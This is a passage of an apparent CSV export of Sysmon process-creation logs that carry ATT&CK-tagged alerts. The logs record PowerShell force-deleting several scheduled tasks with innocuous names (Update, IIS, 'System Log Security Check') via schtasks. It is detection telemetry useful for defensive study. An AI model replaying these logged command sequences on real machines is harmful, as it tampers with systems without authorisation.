C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.820"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010c6bf2100}"",""processId"":""1928"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.739",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.787 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001055bd2100} +ProcessId: 6148 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.791110900Z"",""eventRecordID"":""2813"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.787\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001055bd2100}\r\nProcessId: 6148\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.787"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001055bd2100}"",""processId"":""6148"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.698",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.754 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001029bb2100} +ProcessId: 4228 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.757505800Z"",""eventRecordID"":""2812"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.754\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001029bb2100}\r\nProcessId: 4228\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.754"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001029bb2100}"",""processId"":""4228"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.681",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.719 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001080b82100} +ProcessId: 2596 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.722404000Z"",""eventRecordID"":""2811"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.719\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001080b82100}\r\nProcessId: 2596\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.719"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001080b82100}"",""processId"":""2596"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.634",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.686 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-001022b62100} +ProcessId: 6308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.689325800Z"",""eventRecordID"":""2810"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.686\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-001022b62100}\r\nProcessId: 6308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.686"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-001022b62100}"",""processId"":""6308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.605",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.651 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010cdb32100} +ProcessId: 7788 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.655637300Z"",""eventRecordID"":""2809"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.651\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010cdb32100}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.651"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010cdb32100}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.587",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.620 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00104db12100} +ProcessId: 7272 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.623716200Z"",""eventRecordID"":""2808"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.620\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00104db12100}\r\nProcessId: 7272\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 